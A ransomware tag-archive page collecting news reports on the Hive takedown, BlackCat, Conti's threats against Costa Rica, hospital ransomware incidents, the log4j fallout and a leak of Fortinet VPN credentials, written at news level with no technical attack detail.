- Blackbaud agrees to $49.5 million settlement for ransomware data breach BleepingComputer
- Oregon reaches nearly $50M multi-state settlement over 2020 Blackbaud data breach KOIN.com
- New Mexico getting over $400,000 in settlement with Blackbaud software company KRQE News 13
- Utah AG announcing $600,000 settlement with Blackbaud for data breach ABC4 Utah
- INVESTIGATION ALERT: Scott+Scott Attorneys at Law LLP Investigates Blackbaud, Inc.’s Directors and Officers for Breach of Fiduciary Duties – BLKB Business Wire
- View Full Coverage on Google News
Tag Archives: ransomware
FBI seizes website used by notorious ransomware gang
CNN
—
The FBI has seized the computer infrastructure used by a notorious ransomware gang which has extorted more than $100 million from hospitals, schools and other victims around the world, US officials announced Thursday.
FBI officials since July have had extraordinary access to the so-called Hive ransomware group’s computer networks, FBI Director Christopher Wray said at a news conference, allowing the bureau to pass computer “keys” to victims so that they could decrypt their systems and thwart $130 million in ransom payments.
As of November, Hive ransomware had been used to extort about $100 million from over 1,300 companies worldwide – many of them in health care, according to US officials.
The dark-web website on which Hive listed its victims displayed a message in Russian and English Thursday that it had been taken over “as part of a coordinated law enforcement action” against the group by the FBI, Secret Service and numerous European government agencies.
“Simply put, using lawful means, we hacked the hackers,” Deputy Attorney General Lisa Monaco told reporters.
The Hive ransomware has been particularly rampant in the health care sector. One ransomware attack using Hive malicious software, in August 2021, forced a hospital in the US Midwest to turn away patients as Covid-19 surged, Attorney General Merrick Garland said.
Other reported US victim organizations of Hive include a 314-bed hospital in Louisiana. The hospital said it thwarted a ransomware attack in October, but that the hackers still stole personal data on nearly 270,000 patients.
“Hive compromised the safety and health of patients in hospitals – who are among our most vulnerable population,” said Errol Weiss, chief security officer for the Health Information Sharing and Analysis Center, a cyber threat sharing group for big health care providers worldwide. “When hospitals are attacked and medical systems go down, people can die.”
Thursday’s announcement is the latest in a series of Justice Department efforts to crack down on overseas ransomware groups that lock up US companies’ computers, disrupt their operations and demand millions of dollars to unlock the systems. Justice officials have seized millions of dollars in ransomware payments and urged companies not to pay off the criminals.
The ransomware epidemic grew more urgent for US officials after Colonial Pipeline, the major pipeline operator for sending fuel to the East Coast, shut down for days in May 2021 due to a ransomware attack from a suspected Russian cybercriminal. The disruption led to long lines at gas stations in multiple states as people hoarded fuel.
While the ransomware economy remains lucrative, there are signs that the US and international law enforcement stings are making a dent in the hackers’ earnings. Ransomware revenue fell to about $457 million in 2022, down from $766 million in 2021, according to data from cryptocurrency-tracking firm Chainalysis.
Cybersecurity professionals welcomed the Hive takedown, but some worried that another group would soon fill the void left by Hive.
“The disruption of the Hive service won’t cause a serious drop in overall ransomware activity but it is a blow to a dangerous group that has endangered lives by attacking the healthcare system,” John Hultquist, a vice president at Google-owned cybersecurity firm Mandiant, told CNN.
“Unfortunately, the criminal marketplace at the heart of the ransomware problem ensures a Hive competitor will be standing by to offer a similar service in their absence, but they may think twice before allowing their ransomware to be used to target hospitals,” Hultquist said.
Wray said the FBI would continue to track the people behind Hive ransomware and try to arrest them. It was not immediately clear where those people were located. The Department of Health and Human Services has descried Hive as a “possibly Russian speaking” group.
This story has been updated with additional details.
Elden Ring Publisher Hacked, Ransomware Group Claims
Bandai Namco, the Japanese publisher behind the Ace Combat, Dragon Ball Z, and Dark Souls games, appears to be the latest major gaming company to suffer a major hack. The ransomware group BlackCat added the Elden Ring publisher to its list of victims earlier today, though it’s not yet clear the extent of the damage or how much money the group is demanding.
“ALPHV ransomware group (alternatively referred to as BlackCat ransomware group) claims to have ransomed Bandai Namco,” vx-underground, a group that monitors malware source code on the web, posted on Twitter Monday. Attached was a screenshot of the ALPHV ransomware blog where the group tracks its targets, with Bandai Namco listed under the threat of “data soon” as of July 11.
Bandai Namco did not immediately respond to a request for comment. Vx-underground has previously reported on other hacks, including the infamous Lapsu$ one, before the companies themselves have confirmed them. The ransomware watch group DarkFeed also shared a screenshot of BlackCat’s claimed hack earlier today. Vx-underground and DarkFeed didn’t immediately respond to a request for comment either.
BlackCat, members of which were believed to also be involved in the Colonial Pipeline hack last year, have been ramping up ransomware attacks, according to some computer security analysts as well as the FBI. Most recently, the hacks have resulted in BlackCat posting private employee data online if the victims refuse to pay up. In the past, the group has demanded millions, and targeted school districts and other public entities in addition to for-profit companies.
If legitimate, this would be just the latest in a longline of recent hacks at major gaming companies. Capcom was hit in late 2020, with several of its upcoming unannounced releases like Dragon’s Dogma 2 leaking at the time. A now famous hack of graphics chip manufacturer Nvidia ended up leaking tons of other big gaming projects like Kingdom Hearts 4. CD Projekt Red, the Polish studio behind The Witcher 3 and Cyberpunk 2077, had employee data and the source code for one of its games stolen in early 2021. Even FIFA publisher Electronic Arts was hit, with the alleged perpetrators trying to get media outlet Vice to blackmail the company on its behalf.
It’s unclear how much of the seeming uptick in security breaches is due to new techniques deployed by hackers vs. the greater challenges companies faced when moving to working from home during the global pandemic. Capcom blamed part of its vulnerability on remote work. At the same time, the blockchain network hosting crypto gaming juggernaut Axie Infinity suffered one of the most expensive hacks in history earlier this year, reportedly all because an employee fell for an elaborate phishing scheme.
Earlier this year, Bandai Namco took the servers for Dark Souls I, II, and III offline after a dangerous remote code execution (RCE) exploit was discovered.
Ransomware Group Debuts Searchable Victim Data – Krebs on Security
Cybercrime groups that specialize in stealing corporate data and demanding a ransom not to publish it have tried countless approaches to shaming their victims into paying. The latest innovation in ratcheting up the heat comes from the ALPHV/BlackCat ransomware group, which has traditionally published any stolen victim data on the Dark Web. Today, however, the group began publishing individual victim websites on the public Internet, with the leaked data made available in an easily searchable form.
The ALPHV site claims to care about people’s privacy, but they let anyone view the sensitive stolen data.
ALPHV recently announced on its victim shaming and extortion website that it had hacked a luxury spa and resort in the western United States. Sometime in the last 24 hours, ALPHV published a website with the same victim’s name in the domain, and their logo on the homepage.
The website claims to list the personal information of 1,500 resort employees, and more than 2,500 residents at the facility. At the top of the page are two “Check Yourself” buttons, one for employees, and another for guests.
Brett Callow, a threat analyst with security firm Emsisoft, called the move by ALPHV “a cunning tactic” that will most certainly worry their other victims.
Callow said most of the victim shaming blogs maintained by the major ransomware and data ransom groups exist on obscure, slow-loading sites on the Darknet, reachable only through the use of third-party software like Tor. But the website erected by ALPHV as part of this new pressure tactic is available on the open Internet.
“Companies will likely be more concerned about the prospect of their data being shared in this way than of simply being posted to an obscure Tor site for which barely anyone knows the URL,” Callow said. “It’ll piss people off and make class actions more likely.”
It’s unclear if ALPHV plans to pursue this approach with every victim, but other recent victims of the crime group include a school district and a U.S. city. Most likely, this is a test run to see if it improves results.
“We are not going to stop, our leak distribution department will do their best to bury your business,” the victim website reads. “At this point, you still have a chance to keep your hotel’s security and reputation. We strongly advise you to be proactive in your negotiations; you do not have much time.”
Emerging in November 2021, ALPHV is perhaps most notable for its programming language (it is written in Rust). ALPHV has been actively recruiting operators from several ransomware organizations — including REvil, BlackMatter and DarkSide — offering affiliates up to 90 percent of any ransom paid by a victim organization.
Many security experts believe ALPHV/BlackCat is simply a rebrand of another ransomware group — “Darkside” a.k.a. “BlackMatter,” the same gang responsible for the 2021 attack on Colonial Pipeline that caused fuel shortages and price spikes for several days last summer.
Callow said there may be an upside to this ALPHV innovation, noting that his wife recently heard directly from a different ransomware group — Cl0p.
“On a positive note, stunts like this mean people may actually find out that their PI has been compromised,” he said. “Cl0p emailed my wife last year. The company that lost her data still hasn’t made any public disclosure or notified the people who were impacted (at least, she hasn’t heard from the company.)”
Ransomware gang threatens to overthrow Costa Rica government
SAN JOSE, Costa Rica (AP) — A ransomware gang that infiltrated some Costa Rican government computer systems has upped its threat, saying its goal is now to overthrow the government.
Perhaps seizing on the fact that President Rodrigo Chaves had only been in office for a week, the Russian-speaking Conti gang tried to increase the pressure to pay a ransom by raising its demand to $20 million.
Chaves suggested Monday in a news conference that the attack was coming from inside as well as outside Costa Rica.
“We are at war and that’s not an exaggeration,” Chaves said. He said officials were battling a national terrorist group that had collaborators inside Costa Rica.
Chaves also said the impact was broader than previously known, with 27 government institutions, including municipalities and state-run utilities, affected. He blamed his predecessor Carlos Alvarado for not investing in cybersecurity and for not more aggressively dealing with the attacks in the waning days of his government.
In a message Monday, Conti warned that it was working with people inside the government.
“We have our insiders in your government,” the group said. “We are also working on gaining access to your other systems, you have no other options but to pay us. We know that you have hired a data recovery specialist, don’t try to find workarounds.”
Despite Conti’s threat, experts see regime change as a highly unlikely — or even the real goal.
“We haven’t seen anything even close to this before and it’s quite a unique situation,” said Brett Callow, a ransomware analyst at Emsisoft. “The threat to overthrow the government is simply them making noise and not to be taken too seriously, I wouldn’t say.
“However, the threat that they could cause more disruption than they already have is potentially real and that there is no way of knowing how many other government departments they may have compromised but not yet encrypted.”
Conti attacked Costa Rica in April, accessing multiple critical systems in the Finance Ministry, including customs and tax collection. Other government systems were also affected and a month later not all are fully functioning.
Chaves declared a state of emergency over the attack as soon as he was sworn in last week. The U.S. State Department offered a $10 million reward for information leading to the identification or location of Conti leaders.
Conti responded by writing, “We are determined to overthrow the government by means of a cyber attack, we have already shown you all the strength and power, you have introduced an emergency.”
The gang also said it was raising the ransom demand to $20 million. It called on Costa Ricans to pressure their government to pay.
The attack has encrypted government data and the gang said Saturday that if the ransom wasn’t paid in one week, it would delete the decryption keys.
The U.S. State Department statement last week said the Conti group had been responsible for hundreds of ransomware incidents during the past two years.
“The FBI estimates that as of January 2022, there had been over 1,000 victims of attacks associated with Conti ransomware with victim payouts exceeding $150,000,000, making the Conti Ransomware variant the costliest strain of ransomware ever documented,” the statement said.
While the attack is adding unwanted stress to Chaves’ early days in office, it’s unlikely there was anything but a monetary motivation for the gang.
“I believe this is simply a for-profit cyber attack,” Callow, the analyst said. “Nothing more.”
__
Associated Press writer Christopher Sherman in Mexico City contributed to this report.
Ransomware gang claims it hacked 49ers
A ransomware gang claims it has hacked the 49ers, contending that it has stolen some of the team’s financial data.
Via the Associated Press, the group known as BlackByte posted team documents in a file marked “2020 invoices” in a site on the dark web.
The team has acknowledged a “network security incident” involving some of its corporate IT network systems.
“To date, we have no indication that this incident involves systems outside of our corporate network, such as those connected to Levi’s Stadium operations or ticket holders,” the team said in a statement provided to the AP. This implies that the attack involves systems inside the corporate network, which presumably entails a potentially broad range of information.
The team has said that it notified law enforcement and hired cybersecurity firms to assist in the process.
How quick thinking stopped a ransomware attack from crippling a Florida hospital
The emergency room of Jackson Hospital, a 100-bed facility on Florida’s panhandle, called to report that it couldn’t connect to the charting system that doctors use to look up patients’ medical histories. Jamie Hussey, Jackson Hospital’s IT director, soon realized that the charting software, which was maintained by an outside vendor, was infected with ransomware and that he didn’t have much time to keep the computer virus from spreading.
The hospital shut down its computer systems on his advice.
“If we hadn’t stopped it, it probably would’ve spread out through the entire hospital,” Hussey said. Hospital staff ditched the electronic records and reverted to pen and paper to keep the hospital running and organized, he said, but patient care wasn’t disrupted.
As Hussey spoke to CNN Tuesday, the hospital’s IT systems were gradually coming online, and he was expecting phone calls from the FBI (which investigates hacking incidents) and Aon, a cybersecurity consultancy that Hussey said was supporting the recovery. He was trying to figure out if the hackers had stolen any hospital data, and if they might need to be paid off to get it back.
The damage could’ve been far worse.
Jackson Hospital is just one of several dozen health care organizations across the US that have had to battle ransomware attacks since the coronavirus pandemic began. The disruptions have cost the sector millions of dollars and prompted urgent calls to hospitals from federal officials to be wary of cybercriminal groups.
One suspected ransomware attack in October 2020 forced the University of Vermont to delay chemotherapy appointments, while another in August 2021 prompted the emergency room at Memorial Health System in Ohio to divert patients to other facilities.
In the early minutes and hours of a ransomware attack, hospital cybersecurity teams are on the front lines of the response; help from federal agencies like the FBI might come later.
Yet hospitals don’t often publicly discuss how quick thinking and preemptive action can be the difference between containing a hack and having it spiral out of control. For Hussey, it has meant minimal sleep since Sunday, and the weight of a 600-person staff at Jackson depending on his IT team of about a dozen to get hospital computers up and running again.
“The new guy I just hired is a cybersecurity graduate, so we broke him in really early,” he quipped.
A gradual recovery
Though Hussey’s team acted quickly, Jackson Hospital’s IT systems haven’t come away completely unscathed.
The emergency room’s charting system could be offline for the rest of the week, he said. (Doctors have been getting ER patient records from other parts of the hospital network).
The entire hospital had to temporarily switch to what medical professionals call “downtime procedures” — contingency plans after Hussey’s team shut computers down. For several hours, things like physician notes and prescriptions for patients were processed by hand.
The attackers also encrypted a computer server that Jackson Hospital uses to store non-critical organizational documents. Hussey was trying to figure out if there was anything in those files that contained data on Jackson patients and, if so, if the hospital should pay a ransom to get them back (he said he wasn’t aware of any ransom demand from the hackers).
The ransomware that Hussey’s team found on the charting system is known as Mespinoza and has racked up 190 victim organizations worldwide across various industries, including several in health care, according to a Department of Health and Human Services advisory on the group last week.
The hacking group is just one of several that haven’t refrained from hitting health care organizations during the pandemic. A study last year by the US Cybersecurity and Infrastructure Security Agency found that ransomware attacks can “lead to significant and sustained” strain on hospitals already reeling from a flood of coronavirus patients.
Allan Liska, senior threat intelligence at cybersecurity firm Recorded Future, said there were 134 publicly reported ransomware incidents involving health care organizations in 2021, up from his 2020 tally of 106 incidents.
But many ransomware attacks don’t make the news.
“I’ve worked with a number of healthcare providers recently that have managed to stop a ransomware attack during the reconnaissance stage,” Liska told CNN. “Sharing this information helps other organizations better understand what they should be looking for and developing better strategies for stopping ransomware.”
‘Lock it down and piss people off’
The recovery process at Jackson Hospital has been meticulous to ensure that malicious code isn’t lingering in some neglected part of the network.
Hussey’s team went down the list of computer systems across the hospital, starting with the most critical, and made sure they weren’t infected with ransomware. They physically disconnected the hospital’s electronic health records system from the rest of the computer network to check them for malicious code before reconnecting to the system.
By Wednesday, hospital computers were back online except for the charting systems used by the ER.
Hussey said the decision to shut computer networks down may not be popular with some hospital staff, “but it’s better to be down a day than be down a month.”
“Lock it down and piss people off,” Hussey, who has worked at Jackson for over 25 years, said in a Southern drawl. “It’s what you have to do just to secure your network.”
NASA Denies It Used Log4j in Its Mars Ingenuity Helicopter
Did log4j, the buggy software utility from hell, get NASA’s experimental Mars helicopter hacked? The answer is: Nope—according to NASA, it doesn’t even use the doomed tool.
The Register originally reported that Ingenuity, one of two Mars-based vehicles operated by America’s space agency, uses log4j. In fact, Apache, the maker of the ubiquitous, vulnerability-ridden tool, apparently tweeted back in June that the space-chopper was “powered by” log4j. (File that under things that haven’t aged particularly well.) Predictably, the tweet has since been deleted but the Wayback Machine shows the evidence.
All that “powered by” business was apparently incorrect, with the company telling Futurism that it was “misinformed.”
Log4j, in case you’ve missed it, is a widely used Apache logging program that was recently discovered to be afflicted with serious security vulnerabilities that could easily get you hacked. It has been used by virtually everyone, from coders at Twitter and Apple to those at Amazon and LinkedIn. But not, apparently, the NASA engineers who built Ingenuity.
Ingenuity, which is the first man-made vehicle to fly on an alien planet, was launched last year and landed on Mars in March along with its partner, the Perseverance rover. The automated chopper recently took its 17th flight over the surface of the planet—breaking its previous record by staying aloft for a little over 30 minutes. However, while the flight was mostly a success, the vehicle temporarily disappeared from NASA’s view after suffering a minor network issue. “The rotorcraft’s status after the Dec. 5 flight was previously unconfirmed due to an unexpected cutoff to the in-flight data stream as the helicopter descended toward the surface at the conclusion of its flight,” the space agency reported, in a recent press release.
Ingenuity’s use of the unfortunate Apache utility, coupled with its recent unexpected data disruption, led some to wonder: Did Apache’s bug get NASA’s space chopper hacked?
Absolutely not, according to NASA, which told Futurism this in a statement: “NASA’s Ingenuity helicopter does not run Apache or log4j nor is it susceptible to the log4j vulnerability. NASA takes cybersecurity very seriously and, for this reason, we do not discuss specifics regarding the cybersecurity of agency assets.”
We’ve reached out to NASA for additional information and will update when we hear back.
That it was even plausible that Ingenuity could have used log4j (pronounced “log for j,” as in “log for Java,” according to its creator) more speaks to its ubiquity more than it does to some mystical off-world hacking incident. And, while the bug-ridden utility did not, according to NASA, have anything to do with Ingenuity, it’s still a huge problem. As companies throughout the world race to patch their systems, cybercriminals are hot on their heels—and are already beginning to cause substantial damage.
The Epic Log4j Bug Saga Continues
Case in point, ransomware gangs are now targeting log4j like there’s no tomorrow. It was reported earlier this week that a new ransomware family dubbed “Khonsari” had been going after vulnerable Microsoft computers to attempt exploits. Since then, we’ve also seen hackers affiliated with Conti, a well-known ransomware gang, begin targeting vulnerable systems. In fact, the gang may have just attacked McMenamins—the funky brewery/hotel/events franchise based in Portland, Oregon, which reported an attack Friday. Conti is only suspected at this point.
However, ransomware hackers aren’t the only kids on the block taking advantage of this situation. All kinds of exploitation attempts have been seen throughout the internet, with cybercriminals swarming around the vulnerabilities and trying everything from cryptomining to data theft to everything in between. Additionally, reports of state-backed hacking activities have also popped up, with reports that China, North Korea, Iran, and others, are all leveraging the vulnerabilities for their espionage activities.
Meanwhile, the federal government took emergency action on Friday to secure itself, issuing an order from the U.S. Cybersecurity and Infrastructure Security Agency to all federal Civilian Executive Branch agencies that mandates they patch the Apache bug within the next six days. CISA director Jen Easterly urged all relevant agencies to “join us in this essential effort.”
Yes, it’s all pretty bad. Only time will tell how big the mess wrought by log4j is but don’t hold your breath. It’s going to take awhile to find out how screwed we all are.
Israeli hospital targeted by ransomware attack
The Hillel Yaffe Medical Center in Hadera was targeted by a ransomware attack that affected its computer systems, the hospital announced on Wednesday.
Since the attack, which occurred without any prior warning, the hospital has been using alternate systems while treating patients, and has been writing patients’ information down by hand. The hospital is operating as normal, except for elective, nonurgent operations. All critical equipment is working as it should, including CT and MRI scanners.
In the meantime, Laniado Medical Center in Netanya is prepared to accept patients who cannot be treated at Hillel Yaffe due to the cyberattack. Hillel Yaffe has asked Magen David Adom and the Health Ministry to bring patients who don’t need urgent care to other hospitals.
The incident has been reported to the ministry and National Cyber Directorate and is being handled by the best experts in the field, according to the hospital. The ministry has updated other hospitals about the incident as a preventive measure.
Health Ministry Director-General Prof. Nachman Ash asked hospitals and HMOs to practice maximum alertness amid concerns that there could be further attacks on additional hospitals or clinics, according to N12. Ash also asked that hospitals and HMOs ensure that they have backups that can be used to ensure the continuity of treatment if further attacks take place.
The Hillel Yaffe hospital in Hadera. (credit: Wikimedia Commons)
Amit Spitzer, chief information security officer at Cato Networks, stated that the incident “raises questions about the fate of the personal medical information of many patients at the hospital.”
Spitzer stressed that in similar cases, the ransom payment didn’t help, and the information was eventually leaked or deleted permanently.
“The prevailing assumption is that the attack was carried out by a hostile party who wants to harm, and the ransom demand is here only ostensibly,” said Spitzer.
“Ransomware attacks are no longer a localized problem of one organization or another, but a global scourge that indiscriminately hits critical infrastructure, medical institutes and many businesses around the world,” said Yossi Rachman, director of security research at Cybereason, in response to the attack.
“When it comes to a targeted attack on hospitals, attackers know to expect a quick response from the attacked organization, due to delays in performing critical medical processes as well as the fear of leaking sensitive medical information about patients,” he said.
Cybereason recommends that every organization adhere to well-proven information security practices, including ensuring software is kept updated, and having clear security procedures and tools for rapid protection and response to information security incidents.
The company recommends not cooperating with the attacks and refraining from paying ransom payments.
The attack is the latest in a long series of cyberattacks on Israel in recent years.
Last week, Cybereason revealed that MalKamak, an Iranian state-supported hacker group, was running a highly targeted cyber-espionage operation against global aerospace and telecommunications companies, stealing sensitive information from targets around Israel and the Middle East, as well as in the United States, Russia and Europe. The threat posed by MalKamak is still active.
Last month, a hacker group called Deus leaked data it claims it obtained, in a cyberattack on the Israeli call center service company Voicenter, from the company’s customers, including 10bis, CMTrading, Mobileye, eToro, Gett and My Heritage. The data leaked so far include security camera and webcam footage, ID cards, photos, WhatsApp messages and emails, as well as recordings of phone calls.
A series of cyberattacks has plagued Israeli businesses and institutions in the past two years, including Israel Aerospace Industries, the Shirbit insurance company and the Amital software company.
The National Cyber Directorate reported that it handled more than 11,000 inquiries on its 119 hotline in 2020, some 30% more than it handled in 2019. The directorate made about 5,000 requests to entities to handle vulnerabilities exposing them to attacks, and was in contact with about 1,400 entities concerning attempted or successful attacks.
Zev Stub contributed to this report.
Hackers Just Leaked 500,000 Fortinet VPN Users’ Passwords
A hacker gang has allegedly collected and dumped a large trove of approximately 500,000 login credentials belonging to users of a popular VPN product from cybersecurity firm Fortinet.
The threat actor, who goes by the moniker of “Orange,” apparently leaked the trove of usernames and passwords on a dark web forum on Tuesday, Bleeping Computer has reported. While cybercriminals will often try to sell such data or use it for their own nefarious purposes, Orange apparently posted the large haul of information for free.
The accounts are believed to have been compromised via a previously discovered vulnerability in the product. In April, federal agencies warned of multiple security flaws in Fortinet’s VPN that could allow hackers access. The company has since been issued patches for those security flaws—though that apparently did not stop droves of users from having their account information compromised.
According to research from security firm Advanced Intel, Orange is thought to be a member of the ransomware gang “Groove.” They are reputed to have also previously worked for Babuk, a prominent ransomware gang that attempted to extort the Washington D.C. Metropolitan police department for millions of dollars earlier this year.
Groove recently launched a new cybercrime forum called RAMP and researchers have theorized that the gang may have leaked the VPN accounts as a way of drawing attention to their new business venture.
G/O Media may get a commission
Virtual private networks, meant to protect a user’s confidential data and web activity, can become a privacy nightmare if somebody compromises them. In this case, access to Fortinet VPN accounts would likely allow cybercriminals to infiltrate networks, steal data, or worse. Unfortunately, the threat actor responsible for the leak has claimed that many of the credentials are still valid.
The credentials are reportedly tied to 498,908 users and 12,856 devices—the likes of which are sourced from as many as 74 different countries. The largest share of credentials comes from India, though Italy, France, and Israel also have sizable shares.
Fortinet, which sells a number of security products, hasn’t yet commented on the leak. We reached out to the company for comment and will update this story if they respond.